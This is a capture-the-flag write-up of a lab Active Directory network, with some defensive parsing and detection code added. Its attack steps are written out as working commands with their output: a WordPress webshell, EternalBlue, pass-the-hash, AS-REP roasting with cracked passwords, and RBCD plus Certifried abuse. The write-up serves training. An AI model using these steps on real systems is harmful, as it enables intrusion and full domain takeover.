春秋云镜: 2022 网鼎杯 Semifinal Writeup

Pentesting

flag01

fscan scan

.\fscan -h 39.99.228.226

fscan version: 1.8.3
start infoscan
39.99.228.226:80 open
39.99.228.226:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.228.226 code:200 len:39988 title:XIAORANG.LAB
已完成 2/2
[*] 扫描结束,耗时: 52.9944862s

Wappalyzer shows the web service is WordPress 6.2.6.

So first run wpscan; nothing turned up.

wpscan --url http://39.99.228.226:80 --enumerate vp,vt,tt,u

Directory scanning turns up wp-admin, and the weak credential admin/123456 logs into the backend. Then edit a plugin,

and locate the webshell from WordPress's directory layout:

http://39.99.228.226/wp-content/plugins/akismet/akismet.php

Connected successfully with AntSword (蚁剑).

flag01: flag{336af0e6-723b-4b56-90bc-eafd0f6caa2c}

flag02

Bring the host online with Vshell and scan the internal network

172.22.15.35:135 open
172.22.15.18:135 open
172.22.15.13:135 open
172.22.15.35:139 open
172.22.15.24:139 open
172.22.15.18:139 open
172.22.15.13:139 open
172.22.15.24:135 open
172.22.15.13:88 open
172.22.15.24:80 open
172.22.15.18:80 open
172.22.15.24:3306 open
172.22.15.26:80 open
172.22.15.26:22 open
172.22.15.24:445 open
172.22.15.18:445 open
172.22.15.13:445 open
172.22.15.35:445 open
[*] NetInfo
[*]172.22.15.24
[->]XR-WIN08
[->]172.22.15.24
[*] NetInfo
[*]172.22.15.18
[->]XR-CA
[->]172.22.15.18
[*] NetBios 172.22.15.35 XIAORANG\XR-0687
[*] OsInfo 172.22.15.13 (Windows Server 2016 Standard 14393)
[*] NetBios 172.22.15.13 [+] DC:XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetInfo
[*]172.22.15.35
[->]XR-0687
[->]172.22.15.35
[+] MS17-010 172.22.15.24 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo
[*]172.22.15.13
[->]XR-DC01
[->]172.22.15.13
[*] NetBios 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.15.26 code:200 len:39962 title:XIAORANG.LAB
[*] WebTitle http://172.22.15.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.15.24 code:302 len:0 title:None 跳转url: http://172.22.15.24/www
[+] PocScan http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
[*] WebTitle http://172.22.15.24/www/sys/index.php code:200 len:135 title:None

Quick summary

172.22.15.13 DC

172.22.15.18 XR-CA.xiaorang.lab

172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601

172.22.15.26 external-facing host (the entry point)

172.22.15.35 XIAORANG\XR-0687

There is a Windows Server 2008 R2 in there.

Try EternalBlue against it directly.
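The summary above was assembled by hand from the fscan output. As an added example (not from the original writeup or from fscan itself), a small parser that groups fscan's line-oriented output into one record per host and pulls out the facts a defender would triage first: the DC, the MS17-010 hit, and the AD CS enrollment PoC match. The sample input is a constructed subset of the fscan lines quoted above.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the fscan output lines quoted in this writeup.
SAMPLE = """\
172.22.15.24:80 open
172.22.15.24:3306 open
172.22.15.24:445 open
172.22.15.13:88 open
172.22.15.13:445 open
[*] OsInfo 172.22.15.13 (Windows Server 2016 Standard 14393)
[*] NetBios 172.22.15.13 [+] DC:XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.24 WORKGROUP\\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] MS17-010 172.22.15.24 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle http://172.22.15.18 code:200 len:703 title:IIS Windows Server
[+] PocScan http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
"""

PORT_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+):(\d+) open$")
OSINFO_RE = re.compile(r"^\[\*\] OsInfo (\S+) \((.*)\)$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios (\S+) (.*)$")
MS17_RE = re.compile(r"^\[\+\] (MS17-010) (\S+)")
WEB_RE = re.compile(r"^\[\*\] WebTitle https?://([\d.]+)\S* code:(\d+) .*title:(.*)$")
POC_RE = re.compile(r"^\[\+\] PocScan https?://([\d.]+)\S* (\S+)$")


def parse_fscan(text):
    """Group fscan's line-oriented output into one record per IP address."""
    hosts = defaultdict(lambda: {"ports": set(), "names": [], "os": None,
                                 "web": [], "findings": set()})
    for line in text.splitlines():
        line = line.strip()
        if m := PORT_RE.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := OSINFO_RE.match(line):
            hosts[m[1]]["os"] = m[2]
        elif m := NETBIOS_RE.match(line):
            hosts[m[1]]["names"].append(m[2])
        elif m := MS17_RE.match(line):
            hosts[m[2]]["findings"].add(m[1])   # unpatched SMBv1 host
        elif m := WEB_RE.match(line):
            hosts[m[1]]["web"].append((int(m[2]), m[3]))
        elif m := POC_RE.match(line):
            hosts[m[1]]["findings"].add(m[2])   # e.g. AD CS web enrollment exposed
    return dict(hosts)


def domain_controllers(hosts):
    """Kerberos (88/tcp) or fscan's 'DC:' NetBIOS tag identifies a DC."""
    return sorted(ip for ip, h in hosts.items()
                  if 88 in h["ports"] or any("DC:" in n for n in h["names"]))


def hosts_with_findings(hosts):
    """IPs fscan flagged with a vulnerability or PoC hit, for patch triage."""
    return {ip: sorted(h["findings"]) for ip, h in hosts.items() if h["findings"]}
```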

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit

It worked.

But msf never managed to read the flag, and could not get a shell either.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::

Pass-the-hash to move laterally

proxychains -q python3 wmiexec.py -hashes :0e52d03e9b939997401466a0ec5a9cbc xiaorang.lab/administrator@172.22.15.24 -codec gbk

flag02: flag{44e7697e-f9dc-4afc-86e7-54d15310f01c}

flag03

Originally I wanted to RDP in and look around, but it errored out.

Browse to http://172.22.15.24/www/sys/index.php; the weak credential admin/123456 logs in again.

Then, in the admin backend, a batch of accounts can be exported:

lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab

Then do AS-REP Roasting

proxychains -q impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile usernames.txt xiaorang.lab/

Two hashes came out

$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:446c1896086281087832a8e2a7738c6c$d566cd98b0f19a8c28b113f40b0ad5a6861be2756e5793df1f937af73d4c499f64bf607027f2e12544807905f6fa9ff2a045fec8f9b0fafa706327ef3d76ef41dbe48d3bece3db903b0dae1f52b46f35441b32c0448e42c003a53c6c8b72815f4d4e4512e2ecda083e9050898008944d59f54c64c3a7b6d39fb2d8f5c32b399ee34325d0a085f193056f1651e8713fed7099b970377277c88be436c1b612a85cc86d2e6f41a470bf175481c8da0ad0ea83c63d4fc6c58ec33ebdaa4f3ac23b1ee6c86d77acc3e12c053bfcd0453ee10d886e5c09c10a26db216b3182d5607a844064eb78cdac91b07f01ef46
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:0d527c19a056b9e19e9f5665276e3f3a$61d8bb4122b0dd7c1d4c7ae60890e7622a4b3888ebbb64b4bed37f124ec3948b151a31d9d9861e7e7281f0b048d6a1d26cba65ae9fbe62d45238bd282ab0bc0540f6c52d1cf8ec4a2223d0780ce1d48765963821b15e0a7f6355fe46541ca39b43a5ab81fae0783ea3f90774514364242b8f04f3911051735e485df1f25de35ea752bba7f878e49a6f4c74a7b2969c6d8cda5e9df0e4f723372aadf1fb85ab4188e8980b8b448f3d382a2a069e1212a96a4389510d22d2cec725737ae485b549d10a6840b7c64f1c5581b01760ff77854114a7c397ad5cdb1737fef537c7181ee53c6ae4a9c5b2a166a2da78

Crack them with hashcat.

lixiuying:winniethepooh
huachunmei:1qaz2wsx
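The two lines GetNPUsers produced above are in hashcat's mode-18200 layout. As an added example (not from the original writeup, impacket or hashcat), a parser for that etype-23 layout plus the corresponding defender check: which accounts carry the userAccountControl bit that makes an AS-REP roastable at all. The hash and directory records below are constructed; only the account names come from the page.

```python
import re
from dataclasses import dataclass

HEX = re.compile(r"[0-9a-fA-F]+")
DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit GetNPUsers looks for

# Constructed sample in the layout of the two hashes above; the hex is dummy data.
SAMPLE_HASH = ("$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:"
               + "aa" * 16 + "$" + "bb" * 40)

# Constructed directory records (only the two fields the check needs).
SAMPLE_USERS = [
    {"sAMAccountName": "lixiuying",  "userAccountControl": 0x400200},  # normal + no pre-auth
    {"sAMAccountName": "huachunmei", "userAccountControl": 0x410200},  # same, pwd never expires
    {"sAMAccountName": "zhangyi",    "userAccountControl": 0x200},     # normal account
]

@dataclass
class AsRepHash:
    etype: int      # 23 = RC4-HMAC: key is the unsalted NT hash, so guessing is fast
    user: str       # principal as given to GetNPUsers (here with the @domain suffix)
    realm: str
    checksum: str   # 16-byte HMAC-MD5 over the enc-part, hex
    cipher: str     # encrypted AS-REP enc-part, hex

def parse_asrep(line):
    """Parse the etype-23 $krb5asrep$ layout; raise ValueError for anything else."""
    parts = line.strip().split("$")
    if len(parts) != 5 or parts[1] != "krb5asrep" or parts[2] != "23":
        raise ValueError("not an etype-23 line (etype 17/18 use a 6-field layout)")
    principal, sep, checksum = parts[3].partition(":")
    user, at, realm = principal.rpartition("@")
    if not (sep and at and user and realm):
        raise ValueError("malformed principal")
    if len(checksum) != 32 or not HEX.fullmatch(checksum) or not HEX.fullmatch(parts[4]):
        raise ValueError("checksum must be 16 hex bytes and the cipher text hex")
    return AsRepHash(23, user, realm, checksum.lower(), parts[4].lower())

def is_asrep_line(line):
    try:
        parse_asrep(line)
        return True
    except ValueError:
        return False

def roastable_accounts(users):
    """Accounts with 'Do not require Kerberos preauthentication' set."""
    return sorted(u["sAMAccountName"] for u in users
                  if u["userAccountControl"] & DONT_REQ_PREAUTH)
```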

Use the recovered credentials to collect domain information

proxychains -q bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp

The domain user LIXIUYING has GenericWrite on the computer XR-0687$. BloodHound notes that this can be used for RBCD.

Do an RBCD attack. For details see 春秋云镜-Flarum.

Edit the hosts file

172.22.15.35 XR-0687.xiaorang.lab
172.22.15.13 XR-DC01.xiaorang.lab
172.22.15.18 XR-CA.xiaorang.lab

Add a machine account

proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker$' -computer-pass 'Password@973'

Modify msDS-AllowedToActOnBehalfOfOtherIdentity

proxychains -q impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker$'

This step errored: [-] unsupported hash type MD4

I looked it up; it seems the conda-installed Python has an issue. Switching to the Python I used before conda, it ran successfully.

proxychains -q python3.13 rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker$'

Request the ticket

proxychains -q impacket-getST xiaorang.lab/'hacker$':'Password@973' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

Import the ticket

export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

Then pass-the-ticket to get the flag

proxychains -q python smbexec.py -no-pass -k XR-0687.xiaorang.lab

flag03: flag{01fa7242-bc72-4842-8f0d-f894205e9d81}

flag04

When fscan first scanned the internal network it reported poc-yaml-active-directory-certsrv-detect. Check the certificate templates

proxychains -q certipy-ad find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout

It is CVE-2022-26923 (Certifried) again. It can be attacked the same way as the MagicRelay box; for details see 春秋云镜-MagicRelay.

Create an account and point that machine account's dNSHostName attribute at the domain controller:

proxychains -q certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh  -dc-ip 172.22.15.13 -user citrus -dns XR-DC01.xiaorang.lab -debug

Request a Machine certificate (this had to be run twice)

proxychains -q certipy-ad req -u 'citrus$@xiaorang.lab' -p '5L0GV5vItnNirHOc' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -dc-ip 172.22.15.13 -template 'Machine' -debug 

Try to get the domain admin hash directly (errored again)

proxychains -q certipy-ad auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13

Instead, dump the crt and key out of the certificate

certipy-ad cert -pfx xr-dc01.pfx -nokey -out xr-dc01.crt 
certipy-ad cert -pfx xr-dc01.pfx -nocert -out xr-dc01.key

Modify msDS-AllowedToActOnBehalfOfOtherIdentity

proxychains -q python passthecert.py -action write_rbcd -crt xr-dc01.crt -key xr-dc01.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'citrus$'
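Both attack paths in this writeup (the GenericWrite RBCD step in flag03 and the dNSHostName spoof plus write_rbcd step above) leave the same kind of trace: a Directory Service change (Windows Event ID 5136) on a computer object. As an added example (not from the original writeup or any of the tools it uses), a small detection over constructed 5136-style records that flags any write to msDS-AllowedToActOnBehalfOfOtherIdentity and any dNSHostName value that does not match the account's own name or that collides with a DC. The events and the DC allow-list are constructed; object names follow the page.

```python
# Constructed sample of Directory Service change events (Event ID 5136), reduced to
# the fields a detection needs. OperationType %%14674 is "Value Added".
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "lixiuying", "ObjectClass": "computer",
     "ObjectDN": "CN=XR-0687,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "lixiuying", "ObjectClass": "computer",
     "ObjectDN": "CN=citrus,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "dNSHostName",
     "AttributeValue": "XR-DC01.xiaorang.lab", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "XR-0687$", "ObjectClass": "computer",
     "ObjectDN": "CN=XR-0687,CN=Computers,DC=xiaorang,DC=lab",
     "AttributeLDAPDisplayName": "dNSHostName",
     "AttributeValue": "XR-0687.xiaorang.lab", "OperationType": "%%14674"},
]

# Constructed allow-list of DC FQDNs; in practice maintained from the domain's DC list.
DOMAIN_CONTROLLERS = {"xr-dc01.xiaorang.lab"}


def cn_of(dn):
    """Leading CN= of a distinguished name, lower-cased."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()


def detect(events, dcs=DOMAIN_CONTROLLERS):
    """Return alert tuples for RBCD writes and dNSHostName spoofs on computer objects."""
    alerts = []
    for e in events:
        if e.get("EventID") != 5136 or e.get("ObjectClass") != "computer":
            continue
        if e.get("OperationType") != "%%14674":
            continue                         # only value additions matter here
        attr = e.get("AttributeLDAPDisplayName")
        who, obj = e["SubjectUserName"], cn_of(e["ObjectDN"])
        if attr == "msDS-AllowedToActOnBehalfOfOtherIdentity":
            # Any write here is rare in normal operation; a user account writing it
            # on a host it does not own is the GenericWrite-to-RBCD path.
            alerts.append(("rbcd-write", who, obj))
        elif attr == "dNSHostName":
            value = e.get("AttributeValue", "").lower()
            # A machine's dNSHostName should start with its own name; a value that
            # names a DC is the Certifried precondition.
            if value in dcs or not value.startswith(obj + "."):
                alerts.append(("dnshostname-mismatch", who, obj, value))
    return alerts
```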

Request the ticket

proxychains -q impacket-getST xiaorang.lab/'citrus$':'5L0GV5vItnNirHOc' -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

Import the ticket

unset KRB5CCNAME
export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache

Pass the ticket

proxychains -q python smbexec.py -no-pass -k XR-DC01.xiaorang.lab

flag04: flag{962a1c5c-b9d8-4c8d-b23f-32d3fcd9aab0}
